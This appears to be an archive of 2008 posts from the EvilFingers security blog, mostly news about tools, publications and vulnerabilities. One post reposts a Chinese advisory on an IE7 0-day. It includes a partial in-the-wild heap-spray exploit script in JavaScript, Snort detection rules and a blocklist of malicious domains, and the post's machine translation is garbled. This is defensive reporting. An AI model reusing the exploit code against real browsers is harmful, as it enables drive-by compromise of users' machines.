The Academy Pro joins our Publicity partners group. Check out their site. You need to sign in to access their videos.

About The Academy Pro...

"The Academy provides instructional videos for the information security community. For the first time ever, the average user to the most seasoned industry expert will be able to watch instructional videos on how to install popular products, address common configuration issues, and troubleshoot difficult problems. The Academy is a user driven community and videos are created at the request of its members. Vendors can also leverage the site to showcase the features and capabilities of their products. The Academy is an ideal place to find and share knowledge with others practicing or interested in the information security field."

Contact us if you have any questions or if you wish to be our partners or for any sort of stuff. Contact us if you have some time and you don't know what to do with it... contact.fingers @ is where you could reach us.

- EF

Friday, December 12, 2008

Latest updates @ EF

Out patchTuesday analyst(Ion Visser) is back once again.

NoVirusThanks & EvilFingers are working on creating a threatAnalysis framework.

Thanks to Kris Kaspersky for his wonderful Russian research publications, we have published 88 so far have had 400+ more to publish.

Jack O'Neill is working on Honeypot Framework.

Kirk McGraw is working on updating Process Memory Dumper with more updates.

Gerasimos Kassaras is updating SiXFu with GUI version pretty soon.

Kevin Devine is working on the next version of GSAuditor to come up with a Multi-Core bruteforcer.

Aditya K Sood is researching on Google Chrome.

Giuseppe Bonfa is working on more research publications.

Praveen Darshanam is working on our PCAP section.

Mountassif Moad / Stack is working on our vulnerability analysis division.

We will be coming up with a design for ThreatAnalysis Framework pretty soon.

If you have any questions please do contact us at contact.fingers @

- EF

Thursday, December 11, 2008

IE7 Updates from


IE7 0DAY攻击代码已经在挂马攻击遭利用

Posted by monk on 2008, December 10, 8:47 AM. Filed in 漏洞收集整理

# 鬼仔:刚才发的IE7 0day



知道安全团队(KnownSec team)于近期捕获利用IE7一个内存越界的漏洞进行攻击的恶意代码。此漏洞于11月在小范围内泄露,于12月9日前后才完全出售流通在黑色产业,并且有人赶制出网马生成器,相信会在短期内十分流行。














构造某种条件可以使得SDHTML检测到错误释放已被分配的对象,但是释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行,如果这些内存又被分配给其他用途,将导致SDHTML把这些内存当作一个对象来操作。0DAY挂马里使用了XML的SRC字符串对象占用了这些释放对象的空间,而对象指针里包含函数例程指针,最终导致代码执行 。




2. 开启DEP保护:






2. if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");
4. function sleep(milliseconds)
5. {
6. var start=new Date().getTime();
8. for(var i=0;i<1e7;i++)
9. {if((new Date().getTime()-start)>milliseconds)
10. {break}
11. }
12. }
14. function spray(sc)
15. {
16. var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));
17. var heapBlockSize=0x100000;
18. var payLoadSize=infect.length*2;
19. var szlong=heapBlockSize-(payLoadSize+0x038);
20. var retVal=unescape("%u0a0a%u0a0a");
21. retVal=getSampleValue(retVal,szlong);
22. aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
23. zzchuck=new Array();
24. for(i=0;i< aaablk;i++){zzchuck[i]=retVal+infect}
25. }
27. function getSampleValue(retVal,szlong)
28. {
29. while(retVal.length*2 < szlong)
30. {retVal+=retVal}
31. retVal=retVal.substring(0,szlong/2);
32. return retVal
33. }
35. var a1="dadong";
36. spray(a1+"9090"+a1+"dadong9090da
38. sleep(3000);
40. nav=navigator.userAgent.toLowerCase();
41. if(navigator.appVersion.indexOf('MSIE')!=-1)
42. {
43. version=parseFloat(navigator.appVersion.split('MSIE')[1])
44. }
45. if(version==7)
46. {
47. w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
48. wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
49. if(wxp||w2k3)document.write('< ! [ CDATA[< ! [ CDATA[>]]>');
50. var i=1;while(i<=10)
51. {
52. window.status=" ";i++}
53. }

Translated version:

Aberdeen # ghost: just made the IE7 0day

Source: Security know

In view of the danger of this loophole, as the United States in Microsoft's internal security service providers, we have the first announcement and analysis of the details of the vulnerability, Microsoft and submitted to the relevant departments of the United States, there is no longer publish the details.

Aware of the security team (KnownSec team) in the near future to use IE7 capture a memory of the loopholes in the cross-border attacks by malicious code. This loophole in November in a small area leak, in the Dec. 9 after the sale of full circulation in the black industry, and was working towards a network of horse generator and I believe it is very popular in the short term.

As the loopholes in our monitoring system to capture the first team when we are not very detailed analysis, is that the loophole has been repaired, and the network has identified a number of MA and the net post code, that is not 0DAY loopholes in the internal sharing paste Out of a network linked to the spread of the code, as well as Ma page code. This is our mistake: (


IE7's XML can lead to memory, there are loopholes in cross-border, through the preparation of abnormal use of JavaScript and XML code script SHELLCODE operation to execute arbitrary code.

In the second half of 2008 have been loopholes in IE7, and was about to start in October out of a private sale in November into the black market trading, it was the beginning of the sale of Interviews.

Finally appear in a specific time for the network in December, a large number of second-hand or third-hand loophole in the production and operation of the flow layer, and in early December to start a large number of people buying second-hand to develop the code generator, on the 9th Malaysia began to hang in the use of On.


Impact version:







SDHTML to deal with, because of the existence of objects in memory error led to the disorder.
Construction certain conditions can be detected SDHTML make the release mistakes have been the target of distribution, but has been released after SDHTML distribution of the object did not return but were released to continue to use the memory of the implementation of the object, if the memory was allocated to other purposes , Will lead to SDHTML such as a memory object to the operation. 0DAY linked to the use of the Mali XML string of SRC release of these objects taking up space objects, and object pointer included in routine function pointer, leading to the implementation of the code.

Due to the loophole has not been repaired, please wait for the details of the official Microsoft patch release detailed reference.


1. Please take heed of the official Microsoft site to download patches in a timely manner.

2. Open the DEP protection:

System Properties - High - Performance - Data Execution Prevention

Can prevent malicious attacks.

3. will join, as well as shielding for HOSTS.

Copy the code you can enter the HOSTS:

buhu: to add a section to use code
JavaScript code... Same as above


Unpatched IE7 0-day extended... has released few signatures for the IE7 unpatched 0-day:

#by Joshua Gimer
(msg:"ET CURRENT_EVENTS Possible XML 0-day for Internet
Explorer Exploitation Attempt"; flow:established,from_server; content:"document.write('"; nocase;
classtype:web-application-attack; reference:url,; sid:2008876; rev:3;)

#by matt jonkman, re
(msg:"ET CURRENT_EVENTS Possible XML 0-day for
Internet Explorer Exploitation Attempt (obfuscation 1)"; flow:established,from_server; content:"|7c|XML|7c 7c|if|7c|SPAN|7c|navigator|7c|CDATA|7c|http|7c
|com|7c|w2k3|7c|appVersion|7c|version|7c|nt|7c 7c|X|7c|MSIE|7c|wxp|7c|114|7c|HTML|7c|DATAFLD|7c
reference:url,; sid:2008877; rev:2;)

Revision history of the signatures for IE7 0day can be found HERE. has released more information on this, which can be found HERE.

If the above link has changed, here is the information that was given in the above link:

Wednesday, 10 December 2008
IE7 0-Day Exploit Sites

As many of you have seen, there is a new 0-day exploit in the wild affecting Internet Explorer 7 users. This is a new exploit that is being actively exploited and it was not patched yesterday (meaning there is no patch available, yet). Visiting a website with this exploit can result in a full compromise of an affected system. Currently most of the exploits out there will attempt to download a trojan onto the system. Shadowserver is aware of several hosts which are currently hosting exploit code designed to exploit this vulnerability. We would like to share this information so that it can be used for protection and detection. However, we strongly discourage visiting these sites for any reason. DO NOT visit the below sites as they are currently house live exploit code for the new IE7 0day exploit. The majority if not all of them also house several other exploits for different vulnerabilities as well.

We came across a good many of these ourselves while we also had help from others in the security community that shared the sites. We would like to thank them as the information can now being passed on to you for mitigation. If you know any other sites that can be added to this list of IE7 exploit sites (for the current 0day issue), please drop us a line - steven [at] shadowserver [dot] org.

Domains known to be currently exploiting this vulnerability: - - - - - - - - - does not resolve - possibly hostile in the future - - - - - - - - - - - - - - - - - - - - - - - - - - - does not resolve - possibly hostile in the future - - - - - - - - - - - - - - - - - - does not resolve - possibly hostile in the future - does not resolve - possibly hostile in the future - does not resolve - possibly hostile in the future - does not resolve - possibly hostile in the future - - does not resolve - possibly hostile in the future - - - - - - - - - - does not resolve - possibly hostile in the future - - - - - - - - - - - -

-- The above list is the data we have as of December 10, 2008 - 20:26 UTC/GMT--

Updated/additional sites: - - - -

The following sites have not been seen hosting the IE7 exploits but are closely associated with above sites and should be considered for blocking/monitoring: - - - - - - - - - - - - -

You may have noticed there are a relatively small number of IP addresses involved in our list. It appears that some of the attackers have created several domains with essentially the same set of exploits. We will be updating this list as we get more.
Detection and Prevention

Right now there are just a few things you can do to detect and prevent. Emerging Threats has a few Snort rules that have been released and you can get those by clicking here. However, these will only detect the specific unmodified variants they were written for, so do not consider these fool proof. It can't hurt to throw the rules in though!

Now for prevention, the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not stop completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved. If you are aware of other fixes, please feel free to shoot them our way.

Updated: Microsoft has released a security advisory detailing this vulnerable here. There are additional workarounds now listed such as enabling DEP for IE7. Please take a look.

=>Posted December 10, 2008, at 12:22 PM by Steven Adair

And for getting more info on the exploits, check out yesterday's posting on Exploit release.

- EF

Wednesday, December 10, 2008

67 Total Russian Publications

67 Russian publications can be found at

Do let us know if you have any reviews or questions on anything. We apologize for the delay in the release of articles. We have 400 more Russian articles ready for the release, though we will be releasing on day-to-day basis.

Contact us at contact.fingers @

- EF

MS Internet Explorer XML Parsing Remote Buffer Overflow Exploit 0day (Generic & Specific[Vista])

0-days released for IE7 can be found at the following links:

MS Internet Explorer XML Parsing Remote Buffer Overflow Exploit 0day - Author: Guido Landi

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day - Author: Muts

- EF

Tuesday, December 9, 2008

警惕:IE70DAY攻击代码已经遭挂马攻击利用 (Alert: IE70DAY attack code has been linked to the use of attacks horse)

This is the Chinese text in, translated English Version given by Google Translator.


Alert: IE70DAY attack code has been linked to the use of attacks horse

发布日期:2008-12-09 16:22(GMT) Release date :2008-12-09 16:22 (GMT)

最后更新日期:2008-12-09 18:13(GMT): Last updated :2008-12-09 18:13 (GMT):


鉴于此漏洞的危险性,作为美国微软在国内的安全服务提供商,我们已第一时间发布公告并且分析出漏洞细节,并提交给美国微软相关部门,这里不再公布具体细节。 In view of the danger of this loophole, as the United States in Microsoft's internal security service providers, we have the first announcement and analysis of the details of the vulnerability, Microsoft and submitted to the relevant departments of the United States, there is no longer publish the details.

知道安全团队(KnownSec team)于近期捕获利用IE7一个内存越界的漏洞进行攻击的恶意代码。 Aware of the security team (KnownSec team) in the near future to use IE7 capture a memory of the loopholes in the cross-border attacks by malicious code. 此漏洞于11月在小范围内泄露,于12月9日前后才完全出售流通在黑色产业,并且有人赶制出网马生成器,相信会在短期内十分流行。 This loophole in November in a small area leak, in the Dec. 9 after the sale of full circulation in the black industry, and was working towards a network of horse generator and I believe it is very popular in the short term.

由于该漏洞在我们监控系统最初捕获时我们团队没有很详细地分析,以为是已经被修补的漏洞,并且在网络上发现了很多网马以及代码帖子,以为不是0DAY漏洞,便在内部共享粘贴流出了网络上流传的代码以及挂马页面的代码。 As the loopholes in our monitoring system to capture the first team when we are not very detailed analysis, is that the loophole has been repaired, and the network has identified a number of MA and the net post code, that is not 0DAY loopholes in the internal sharing paste Out of a network linked to the spread of the code, as well as Ma page code. 这是我们的失误:( This is our mistake: (

历史: History:

IE7的XML里存在可以导致内存越界的漏洞,通过编写畸形XML代码并且使用JavaScript脚本操作SHELLCODE去执行任意代码。 IE7's XML can lead to memory, there are loopholes in cross-border, through the preparation of abnormal use of JavaScript and XML code script SHELLCODE operation to execute arbitrary code.

在2008年下半年开始有流传IE7的漏洞,并于10月份左右开始流出私人买卖,于11月份流入黑市买卖,开始有人面谈出售。 In the second half of 2008 have been loopholes in IE7, and was about to start in October out of a private sale in November into the black market trading, it was the beginning of the sale of Interviews.

最终出现在网络的具体时间为12月份,大量二手三手漏洞在黑产运作层流通,并且于12月份初开始有大量的人购买二手代码去开发生成器,在9号开始出现在挂马利用上。 Finally appear in a specific time for the network in December, a large number of second-hand or third-hand loophole in the production and operation of the flow layer, and in early December to start a large number of people buying second-hand to develop the code generator, on the 9th Malaysia began to hang in the use of On.

分析: Analysis:

影响版本: Impact version:

系统: System:



浏览器: Browser:


描述: Description:

由于SDHTML里处理对象存在在错误导致内存紊乱。 SDHTML to deal with, because of the existence of objects in memory error led to the disorder.
构造某种条件可以使得SDHTML检测到错误释放已被分配的对象,但是释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行,如果这些内存又被分配给其他用途,将导致SDHTML把这些内存当作一个对象来操作。 Construction certain conditions can be detected SDHTML make the release mistakes have been the target of distribution, but the release has been the target of the distribution after the return to SDHTML not been released but continue to use the memory of the implementation of the object, if the memory was allocated to other purposes , Will lead to SDHTML such as a memory object to the operation. 0DAY挂马里使用了XML的SRC字符串对象占用了这些释放对象的空间,而对象指针里包含函数例程指针,最终导致代码执行。 0DAY linked to the use of the Mali XML string of SRC release of these objects taking up space objects, and object pointer included in routine function pointer, leading to the implementation of the code.

由于该漏洞尚未被修补,具体细节请等待微软官方发布补丁的详细参考。 Due to the loophole has not been repaired, please wait for the details of the official Microsoft patch release detailed reference.

防御: Defense:

1.请关注微软官方网站及时下载补丁。 1. Please take heed of the official Microsoft site to download patches in a timely manner.

2. 开启DEP保护: 2. Open the DEP protection:

系统属性——高级——性能——数据执行保护 System Properties - High - Performance - Data Execution Prevention

可以防止恶意攻击。 Can prevent malicious attacks.

3.将wwwwyyyyy.cn以及sllwrnm5.cn加入HOSTS进行屏蔽。 3. will join, as well as shielding for HOSTS.

复制一下代码进入HOSTS即可: Copy the code you can enter the HOSTS:

Popularity: 27% [ ? ] Popularity: 27% [?]

- EF

Overwriting Hard Drive Data: The Great Wiping Controversy

The paper that Dave Kleiman, Shyaam Sundhar and myself published on the use of an electron microscope with respect to data recovery is now available.


This is also being presented by myself at ICISS 2008.

The abstract follows.

Dr Craig Wright GSE-Compliance, GSE-Malware

Overwriting Hard Drive Data: The Great Wiping Controversy
Book Series Lecture Notes in Computer Science
Publisher Springer Berlin / Heidelberg
ISSN 0302-9743 (Print) 1611-3349 (Online)
Volume Volume 5352/2008
Book Information Systems Security
DOI 10.1007/978-3-540-89862-7
Copyright 2008
ISBN 978-3-540-89861-0
DOI 10.1007/978-3-540-89862-7_21
Pages 243-257
Subject Collection Computer Science
SpringerLink Date Thursday, December 04, 2008

Often we hear controversial opinions in digital forensics on the required or desired number of passes to utilize for properly overwriting, sometimes referred to as wiping or erasing, a modern hard drive. The controversy has caused much misconception, with persons commonly quoting that data can be recovered if it has only been overwritten once or twice. Moreover, referencing that it actually takes up to ten, and even as many as 35 (referred to as the Gutmann scheme because of the 1996 Secure Deletion of Data from Magnetic and Solid-State Memory published paper by Peter Gutmann) passes to securely overwrite the previous data. One of the chief controversies is that if a head positioning system is not exact enough, new data written to a drive may not be written back to the precise location of the original data. We demonstrate that the controversy surrounding this topic is unfounded.

Keywords Digital Forensics - Data Wipe - Secure Wipe - Format

Microsoft Bulletin Dec 9th 2008 Release

Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution(932349): MS08-070

Vulnerabilities in GDI Could Allow Remote Code Execution(956802): MS08-071

Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution(957173): MS08-072

Cumulative Security Update for Internet Explorer (958215): MS08-073

Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070): MS08-074

Vulnerabilities in Windows Search Could Allow Remote Code Execution (959349): MS08-075

Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807): MS08-076

Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175): MS08-077

Check out for more information.

- EF

Monday, December 8, 2008

IDA Pro Plugin Writers

Hey Readers,

First, Thanks to Ion for jumping back into action once again. Secondly, we are desperately in need of plug-in writer for IDA Pro as we have been planning to release some plug-ins for a while and have been stepping on our crunchy schedule. Kindly, volunteer by mailing us at contact.fingers @

Even if you feel that you do not have time to work on anything outside your normal work, just contact us once and we will work out a schedule for you by sitting with you in order to benefit you and us. We will ensure that every single volunteer of EvilFingers gets something or the other in return. This is EOV(Equal Opportunity Volunteering), which means despite your region, sex or race, we will bring you in and ensure the best for both parties.

Rock on, guys!!!

- EF

Friday, December 5, 2008

Microsoft Advance Notification - December

After more than a month of my inactive status, let me share with you December's Advance Notification for MS Patch Tuesday. According to MS, 8 security bulletins are due for release of which "Six Microsoft Security Bulletins rated as Critical and two rated as Important" Here is a brief overview:


- Windows Operating System (2 bulletins)
- Internet Explorer (this is always a little dicey, for it may have multiple CVE IDs)
- VB
- MS Word (may have multiple CVE IDs)
- MS Excel (may have multiple CVE IDs)


- Sharepoint

This patch tuesday surely gonna be a little tougher than before with the exploit flowing in. Gear up! And, by the way if you have any information regarding 'any' exploit or 'any' related vulnerability feel free to contact us.

/best wishes/
- Ion

Reverse Engineering of Strong Crypto Signatures Schemes

Thanks to Giuseppe Bonfa a.k.a. 'EvilCry' for the hard core analysis paper on Strong Crypto Signatures Schemes. This paper can be found here.

Abstract: In this paper (Reverse Engineering of Strong Crypto Signatures Schemes) we will have the usual classical style of a CryptoReversing Approach, what we going talk about are the ECC also known as Elliptic Curve Cryptography; after a theorial study we will fly to the most common Secured Software Applications with a touch of Hardware Security.ware.

- EF

Thursday, December 4, 2008

Successful release of Russian publication!!!

We had a successful release of Russian publication... Check out

- EF

Tuesday, December 2, 2008

Is Security a Myth or Reality?

Security has been considered as a blanket on top of existing toolkit or products. Some people consider security as additional and business as the primary factor. The problem is, security and business should coordinate right from the architectural design before the foundation is laid. A security aware foundation acts as a reinforced concrete. It is much stronger to consider security and business, than a business centric architecture. We in EvilFingers consider business and security as 2 important factors like, 2 hands, 2 eyes, 2 legs, etc. and without one of them, the other is overloaded.

Security has been there since the age of empires and there has been buying and selling of things too. But security was given the most importance by building layered fortresses, forts, etc. Buying and selling was something that was done for survival like food, shelter and so on. Ever since industrial revolution kicked in, everything ran business centric. Now we have crossed the industrial revolution and we are in the information era. In this era, almost everything is run and controlled by computers, things are semi-automated. That being the case, should security be a myth(something that could have existed in the past based on history) or is it reality(something that should be considered as heart of a product, sole being business).

Let us know your views. Contact us at contact.fingers @

- EF

Monday, December 1, 2008

Russian publications releasing soon!!!

Thanks to Kris Kaspersky, we would have over 470 Russian articles releasing soon at EvilFingers. Kris Kaspersky represents (EvilFingers Russian Community) as discussed in one of the previous blogs.

If you would like to contribute or if you have any questions, contact us at contact.fingers @

- EF

Saturday, November 29, 2008

Simple XSS Fuzzer v 1.0

We are proud to announce the release of our new tool, Simple XSS Fuzzer (SiX Fu) v 1.0.

Credit: Gerasimos Kassaras

Gerasimos Kassaras is a blogger for and

The work flow of SiX Fu is as follows:

We will be releasing a "How-to" document in the publication section as well as with the tool package. The tool would be released in the next few hours.

- EF

Our Ancestral Wealth!!!

If you wish to inherit all our ancestral wealth (US $125,000,000,000,000,000), kindly click on the following link asap:


- EF

Friday, November 28, 2008

Thanks Giving Sale!!!

Hey guys,

Just like any other shop (online or offline), we have opened up a sale just for you and only for this thanks giving 2008. Well, not really!!! We are releasing a new tool called GSAuditor and yes you can download this any day @ any point of time (starting from the day of release: Friday 28th Nov, 2008).

Generic SHA-1 Auditor (GSAuditor) is an application that allows you to brute force password hashes derived from SHA-1. NOTE: GSAuditor is an "experimental" tool.

Current version of GSAuditor supports the following algorithms:

* RAW-SHA-1($password) - Mac OS 10.3 'Panther'
* SHA-1(UNICODE($password).$salt) - MS SQL 2000/2005 (remember that 2000 uses uppercase password!)
* SHA-1($password.$salt) - ORACLE 11g (the salt is currently 10 bytes)
* SHA-1($username.$password) - PHP
* SHA-1($salt.$password) - Mac OS 10.4 'Tiger'

GSAuditor is in early stages of development, so if you encounter any bugs or request additional features. Contact contact.fingers @ if you have any further questions.

PS: We do know that thanks giving was yesterday and the black Friday sale is done already. But sometimes, it takes time to realize that the vacation day has come to an end only when you are almost awake. Cheers !!!

- EF

What is one thing according to you that could change our community?

We asked the following question to a gentleman from the infoSec community:
"What would be one thing according to you that could change our community for its best?"

He looked around for a while, and then said:
"When our community starts evaluating about 'what you know', more than 'whom do you know', then I am sure there is more opportunity for our community to auto-clean."

Isn't that a pinch of reality...

- EF

Thursday, November 27, 2008

"NoVirusThanks" on Projects Page

NoVirusThanks offers a free online detection service that analyzes suspicious and malicious files for viruses/worms, Trojans/backdoor and all kinds of Malware that are not only detected by antivirus engines including bots, rootkits, etc.

NoVirusThanks also publishes a blog on analysis of new or weird Malware.

We have provided a page for all out users to submit their suspicious files to NoVirusThanks, which can be found

NOTE: This page is NOT intended for comparing AV's.

Let us know if you have any questions. Contact us at contact.fingers @

- EF

Tuesday, November 25, 2008

Developers Welcome!!!

We are looking for developers with knowledge in any of the following languages:
Scripting: Perl, Python, Shellscript, Ruby
Languages: C/C++, Java, VB, .Net

Contact us at contact.fingers @

- EF

Google Chrome MetaCharacter URI Obfuscation Vulnerability.

Google Chrome's latest vulnerability on MetaCharacter URI Obfuscation, released by Aditya K Sood reached the media today.

This is EvilFinger's 5th Vulnerability finding on Google Chrome (3 in Sep 2008, 1 in Oct 2008 and 1 in Nov 2008).

Nov 24, 2008 Google Chrome MetaCharacter URI Obfuscation Vulnerability

Oct 20, 2008 Google Chrome OnbeforeUload and OnUnload Null Check Vuln

Sep 27, 2008 Google Chrome Window Object Suppressing Remote DoS

Sep 23, 2008 Google Chrome Carriage Return Null Obj. Memory Exhaustion Remote DoS

Sep 2, 2008 Google Chrome Browser in chrome.dll

The latest finding was released on 24th Nov 2008 after the security update that fixed URL spoofing flaw that was aimed at pop-ups.

Some websites that listed the latest flaw:

For more details contact us.

- EF